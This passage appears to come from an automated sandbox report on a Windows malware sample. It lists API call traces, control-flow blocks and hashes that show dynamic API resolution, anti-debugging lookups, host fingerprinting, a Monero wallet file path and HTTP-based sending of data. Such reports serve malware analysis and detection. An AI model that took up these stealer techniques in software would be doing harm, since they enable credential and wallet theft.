InternetCloseHandle 15937->15939 15940 be53b7 15937->15940 15939->15912 15941 bfa9b0 4 API calls 15940->15941 15942 be53cb 15941->15942 15943 bfa8a0 lstrcpy 15942->15943 15944 be53d4 15943->15944 15945 bfa920 3 API calls 15944->15945 15946 be53f2 15945->15946 15947 bfa8a0 lstrcpy 15946->15947 15948 be53fb 

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              (graph image not reproduced; covers the function at bf9860-bf9bc2, whose blocks call GetProcAddress and LoadLibraryA)
                              APIs
                              • GetProcAddress.KERNEL32(77190000,009B15E8), ref: 00BF98A1
                              • GetProcAddress.KERNEL32(77190000,009B16F0), ref: 00BF98BA
                              • GetProcAddress.KERNEL32(77190000,009B1738), ref: 00BF98D2
                              • GetProcAddress.KERNEL32(77190000,009B1588), ref: 00BF98EA
                              • GetProcAddress.KERNEL32(77190000,009B16A8), ref: 00BF9903
                              • GetProcAddress.KERNEL32(77190000,009B8B38), ref: 00BF991B
                              • GetProcAddress.KERNEL32(77190000,009A55E8), ref: 00BF9933
                              • GetProcAddress.KERNEL32(77190000,009A53A8), ref: 00BF994C
                              • GetProcAddress.KERNEL32(77190000,009B1510), ref: 00BF9964
                              • GetProcAddress.KERNEL32(77190000,009B14F8), ref: 00BF997C
                              • GetProcAddress.KERNEL32(77190000,009B1618), ref: 00BF9995
                              • GetProcAddress.KERNEL32(77190000,009B16C0), ref: 00BF99AD
                              • GetProcAddress.KERNEL32(77190000,009A5408), ref: 00BF99C5
                              • GetProcAddress.KERNEL32(77190000,009B1630), ref: 00BF99DE
                              • GetProcAddress.KERNEL32(77190000,009B17C8), ref: 00BF99F6
                              • GetProcAddress.KERNEL32(77190000,009A5708), ref: 00BF9A0E
                              • GetProcAddress.KERNEL32(77190000,009B15A0), ref: 00BF9A27
                              • GetProcAddress.KERNEL32(77190000,009B1660), ref: 00BF9A3F
                              • GetProcAddress.KERNEL32(77190000,009A5728), ref: 00BF9A57
                              • GetProcAddress.KERNEL32(77190000,009B1870), ref: 00BF9A70
                              • GetProcAddress.KERNEL32(77190000,009A5428), ref: 00BF9A88
                              • LoadLibraryA.KERNEL32(009B1810,?,00BF6A00), ref: 00BF9A9A
                              • LoadLibraryA.KERNEL32(009B1888,?,00BF6A00), ref: 00BF9AAB
                              • LoadLibraryA.KERNEL32(009B1840,?,00BF6A00), ref: 00BF9ABD
                              • LoadLibraryA.KERNEL32(009B18B8,?,00BF6A00), ref: 00BF9ACF
                              • LoadLibraryA.KERNEL32(009B1828,?,00BF6A00), ref: 00BF9AE0
                              • GetProcAddress.KERNEL32(76850000,009B17F8), ref: 00BF9B02
                              • GetProcAddress.KERNEL32(77040000,009B18A0), ref: 00BF9B23
                              • GetProcAddress.KERNEL32(77040000,009B1858), ref: 00BF9B3B
                              • GetProcAddress.KERNEL32(75A10000,009B8D50), ref: 00BF9B5D
                              • GetProcAddress.KERNEL32(75690000,009A5448), ref: 00BF9B7E
                              • GetProcAddress.KERNEL32(776F0000,009B8B98), ref: 00BF9B9F
                              • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00BF9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00BF9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: a4e3679a05b9e149a3d9dcaac01860ed23345fd25434b64eea23b42cc87d1dd7
                              • Instruction ID: 7fda3ccd00f2c9d54a499cedb911d064d096a1c78e27e9f1b13129d55bd53a35
                              • Opcode Fuzzy Hash: a4e3679a05b9e149a3d9dcaac01860ed23345fd25434b64eea23b42cc87d1dd7
                              • Instruction Fuzzy Hash: 6BA14CB55002409FD368EFAAFE88A6637F9F74C70170C453AE606E3264D739984BCB56

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              (graph image not reproduced; covers the function at be45c0-be47a9, whose blocks call RtlAllocateHeap and VirtualProtect)
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BE479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4617
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 5be8baa0b9452697814bf5c9701ed1f423c670f0b1ca06c8106f89f1feb94e9d
                              • Instruction ID: 89e58db878a93944713804ddabcfa364676c94fc1aa5e7f7f3ec9a7cf10e4d61
                              • Opcode Fuzzy Hash: 5be8baa0b9452697814bf5c9701ed1f423c670f0b1ca06c8106f89f1feb94e9d
                              • Instruction Fuzzy Hash: 714103606C26447FE628BFE48C46E9F7766DF46B08F606060EA00522E2CFB07542ED36

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              (graph image not reproduced; covers the function at be4880-be4fa2, whose blocks call InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile and InternetCloseHandle)
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                                • Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BE4915
                              • StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C00DDB,00000000,?,?,00000000,?,",00000000,?,009BF390), ref: 00BE4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BE4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BE4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BE4E49
                              • InternetCloseHandle.WININET(00000000), ref: 00BE4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00BE4EC5
                              • HttpOpenRequestA.WININET(00000000,009BF4C0,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE4B15
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • InternetCloseHandle.WININET(00000000), ref: 00BE4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 6a3d16ec97fc1b3af4b9583e15196629773a80f8e35e5c8157e0b3eec8b2b478
                              • Instruction ID: 7e02ad4c631119bf48f30943b7eee337e2cd4c18257902ff43e45be1d4274de3
                              • Opcode Fuzzy Hash: 6a3d16ec97fc1b3af4b9583e15196629773a80f8e35e5c8157e0b3eec8b2b478
                              • Instruction Fuzzy Hash: 7E1299B191011CAADB19EB54DD92FEEB3B9AF14340F5441E9B20A73091DFB06B4DCB62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: c31a17e05d61335d095dc370acf3c0cd118ef01299f07375835d4a93e0c5ed56
                              • Instruction ID: ce23476f38220376d446839097168cc72277eec35bfec7de7f6281aa1fe7386d
                              • Opcode Fuzzy Hash: c31a17e05d61335d095dc370acf3c0cd118ef01299f07375835d4a93e0c5ed56
                              • Instruction Fuzzy Hash: 7D0186B1A44209EFC714DF95DD49BAABBF8F704B11F1042A9FA45E3280C77459088BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F
Memory Dump Source
• Same source file (00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true) and the same associated dumps as the entry above.
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: d2d5ad6205156b2d85cfecb809c552be64a099e4007bffdb46476c5bd1273fb5
                              • Instruction ID: 2dd80735fedbcade2cc53881cad734c5eacd997a10a005f54314c45e0a35fb0e
                              • Opcode Fuzzy Hash: d2d5ad6205156b2d85cfecb809c552be64a099e4007bffdb46476c5bd1273fb5
                              • Instruction Fuzzy Hash: E2F04FB1944208AFC714DF99DD49FAEBBB8EB04711F10066AFA05A3680C77415098BA1
                              APIs
Memory Dump Source
• Same source file (00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true) and the same associated dumps as the entry above.
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 8e0fd0475ec40635d1b827e5e1140223e341750799a386d355e80c8baca360df
                              • Instruction ID: 199b9b0c0a02126d4a22f9ff89cbc96f2f3ac75302b029d01ceef7830a97683f
                              • Opcode Fuzzy Hash: 8e0fd0475ec40635d1b827e5e1140223e341750799a386d355e80c8baca360df
                              • Instruction Fuzzy Hash: 31D05E7490030CDFCB10DFE1DC496EDBBB8FB08311F1405A5D90572340EA305486CAAA

Control-flow Graph (basic block id, address range, calls made in the block; "->" lists successor blocks)

• 633 bf9c10-bf9c1a -> 634, 635
• 634 bfa036-bfa0ca LoadLibraryA * 8 -> 636, 637
• 635 bf9c20-bfa031 GetProcAddress * 43 -> 634
• 636 bfa0cc-bfa141 GetProcAddress * 5 -> 637
• 637 bfa146-bfa14d -> 638, 639
• 638 bfa216-bfa21d -> 640, 641
• 639 bfa153-bfa211 GetProcAddress * 8 -> 638
• 640 bfa21f-bfa293 GetProcAddress * 5 -> 641
• 641 bfa298-bfa29f -> 642, 643
• 642 bfa337-bfa33e -> 644, 645
• 643 bfa2a5-bfa332 GetProcAddress * 6 -> 642
• 644 bfa41f-bfa426 -> 646, 647
• 645 bfa344-bfa41a GetProcAddress * 9 -> 644
• 646 bfa428-bfa49d GetProcAddress * 5 -> 647
• 647 bfa4a2-bfa4a9 -> 648, 649
• 648 bfa4dc-bfa4e3 -> 650, 651
• 649 bfa4ab-bfa4d7 GetProcAddress * 2 -> 648
• 650 bfa515-bfa51c -> 652, 653
• 651 bfa4e5-bfa510 GetProcAddress * 2 -> 650
• 652 bfa612-bfa619 -> 654, 655
• 653 bfa522-bfa60d GetProcAddress * 10 -> 652
• 654 bfa67d-bfa684 -> 656, 657
• 655 bfa61b-bfa678 GetProcAddress * 4 -> 654
• 656 bfa69e-bfa6a5 -> 658, 659
• 657 bfa686-bfa699 GetProcAddress -> 656
• 658 bfa708-bfa709 (function exit)
• 659 bfa6a7-bfa703 GetProcAddress * 4 -> 658
                              APIs
                              • GetProcAddress.KERNEL32(77190000,009A5548), ref: 00BF9C2D
                              • GetProcAddress.KERNEL32(77190000,009A5388), ref: 00BF9C45
                              • GetProcAddress.KERNEL32(77190000,009B9068), ref: 00BF9C5E
                              • GetProcAddress.KERNEL32(77190000,009B9038), ref: 00BF9C76
                              • GetProcAddress.KERNEL32(77190000,009B9080), ref: 00BF9C8E
                              • GetProcAddress.KERNEL32(77190000,009BD680), ref: 00BF9CA7
                              • GetProcAddress.KERNEL32(77190000,009AA960), ref: 00BF9CBF
                              • GetProcAddress.KERNEL32(77190000,009BD6C8), ref: 00BF9CD7
                              • GetProcAddress.KERNEL32(77190000,009BD650), ref: 00BF9CF0
                              • GetProcAddress.KERNEL32(77190000,009BD668), ref: 00BF9D08
                              • GetProcAddress.KERNEL32(77190000,009BD788), ref: 00BF9D20
                              • GetProcAddress.KERNEL32(77190000,009A5608), ref: 00BF9D39
                              • GetProcAddress.KERNEL32(77190000,009A55A8), ref: 00BF9D51
                              • GetProcAddress.KERNEL32(77190000,009A5588), ref: 00BF9D69
                              • GetProcAddress.KERNEL32(77190000,009A53E8), ref: 00BF9D82
                              • GetProcAddress.KERNEL32(77190000,009BD740), ref: 00BF9D9A
                              • GetProcAddress.KERNEL32(77190000,009BD6F8), ref: 00BF9DB2
                              • GetProcAddress.KERNEL32(77190000,009AA5F0), ref: 00BF9DCB
                              • GetProcAddress.KERNEL32(77190000,009A5468), ref: 00BF9DE3
                              • GetProcAddress.KERNEL32(77190000,009BD7D0), ref: 00BF9DFB
                              • GetProcAddress.KERNEL32(77190000,009BD710), ref: 00BF9E14
                              • GetProcAddress.KERNEL32(77190000,009BD758), ref: 00BF9E2C
                              • GetProcAddress.KERNEL32(77190000,009BD770), ref: 00BF9E44
                              • GetProcAddress.KERNEL32(77190000,009A55C8), ref: 00BF9E5D
                              • GetProcAddress.KERNEL32(77190000,009BD7B8), ref: 00BF9E75
                              • GetProcAddress.KERNEL32(77190000,009BD698), ref: 00BF9E8D
                              • GetProcAddress.KERNEL32(77190000,009BD7E8), ref: 00BF9EA6
                              • GetProcAddress.KERNEL32(77190000,009BD728), ref: 00BF9EBE
                              • GetProcAddress.KERNEL32(77190000,009BD7A0), ref: 00BF9ED6
                              • GetProcAddress.KERNEL32(77190000,009BD638), ref: 00BF9EEF
                              • GetProcAddress.KERNEL32(77190000,009BD6B0), ref: 00BF9F07
                              • GetProcAddress.KERNEL32(77190000,009BD6E0), ref: 00BF9F1F
                              • GetProcAddress.KERNEL32(77190000,009BD230), ref: 00BF9F38
                              • GetProcAddress.KERNEL32(77190000,009AFDA8), ref: 00BF9F50
                              • GetProcAddress.KERNEL32(77190000,009BD098), ref: 00BF9F68
                              • GetProcAddress.KERNEL32(77190000,009BD0B0), ref: 00BF9F81
                              • GetProcAddress.KERNEL32(77190000,009A5488), ref: 00BF9F99
                              • GetProcAddress.KERNEL32(77190000,009BD1D0), ref: 00BF9FB1
                              • GetProcAddress.KERNEL32(77190000,009A54A8), ref: 00BF9FCA
                              • GetProcAddress.KERNEL32(77190000,009BD290), ref: 00BF9FE2
                              • GetProcAddress.KERNEL32(77190000,009BD128), ref: 00BF9FFA
                              • GetProcAddress.KERNEL32(77190000,009A54C8), ref: 00BFA013
                              • GetProcAddress.KERNEL32(77190000,009A5568), ref: 00BFA02B
                              • LoadLibraryA.KERNEL32(009BD0C8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA03D
                              • LoadLibraryA.KERNEL32(009BD1E8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA04E
                              • LoadLibraryA.KERNEL32(009BD2A8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA060
                              • LoadLibraryA.KERNEL32(009BD110,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA072
                              • LoadLibraryA.KERNEL32(009BD218,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA083
                              • LoadLibraryA.KERNEL32(009BD068,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA095
                              • LoadLibraryA.KERNEL32(009BD050,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA0A7
                              • LoadLibraryA.KERNEL32(009BD320,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA0B8
                              • GetProcAddress.KERNEL32(77040000,009A50A8), ref: 00BFA0DA
                              • GetProcAddress.KERNEL32(77040000,009BD200), ref: 00BFA0F2
                              • GetProcAddress.KERNEL32(77040000,009B8B58), ref: 00BFA10A
                              • GetProcAddress.KERNEL32(77040000,009BD170), ref: 00BFA123
                              • GetProcAddress.KERNEL32(77040000,009A5208), ref: 00BFA13B
                              • GetProcAddress.KERNEL32(74390000,009AA988), ref: 00BFA160
                              • GetProcAddress.KERNEL32(74390000,009A5308), ref: 00BFA179
                              • GetProcAddress.KERNEL32(74390000,009AA640), ref: 00BFA191
                              • GetProcAddress.KERNEL32(74390000,009BD038), ref: 00BFA1A9
                              • GetProcAddress.KERNEL32(74390000,009BD248), ref: 00BFA1C2
                              • GetProcAddress.KERNEL32(74390000,009A5008), ref: 00BFA1DA
                              • GetProcAddress.KERNEL32(74390000,009A5048), ref: 00BFA1F2
                              • GetProcAddress.KERNEL32(74390000,009BD260), ref: 00BFA20B
                              • GetProcAddress.KERNEL32(768D0000,009A50E8), ref: 00BFA22C
                              • GetProcAddress.KERNEL32(768D0000,009A5328), ref: 00BFA244
                              • GetProcAddress.KERNEL32(768D0000,009BD0F8), ref: 00BFA25D
                              • GetProcAddress.KERNEL32(768D0000,009BD080), ref: 00BFA275
                              • GetProcAddress.KERNEL32(768D0000,009A5028), ref: 00BFA28D
                              • GetProcAddress.KERNEL32(75790000,009AA870), ref: 00BFA2B3
                              • GetProcAddress.KERNEL32(75790000,009AA578), ref: 00BFA2CB
                              • GetProcAddress.KERNEL32(75790000,009BD0E0), ref: 00BFA2E3
                              • GetProcAddress.KERNEL32(75790000,009A5068), ref: 00BFA2FC
                              • GetProcAddress.KERNEL32(75790000,009A5168), ref: 00BFA314
                              • GetProcAddress.KERNEL32(75790000,009AA708), ref: 00BFA32C
                              • GetProcAddress.KERNEL32(75A10000,009BD140), ref: 00BFA352
                              • GetProcAddress.KERNEL32(75A10000,009A4FA8), ref: 00BFA36A
                              • GetProcAddress.KERNEL32(75A10000,009B8B68), ref: 00BFA382
                              • GetProcAddress.KERNEL32(75A10000,009BD158), ref: 00BFA39B
                              • GetProcAddress.KERNEL32(75A10000,009BD188), ref: 00BFA3B3
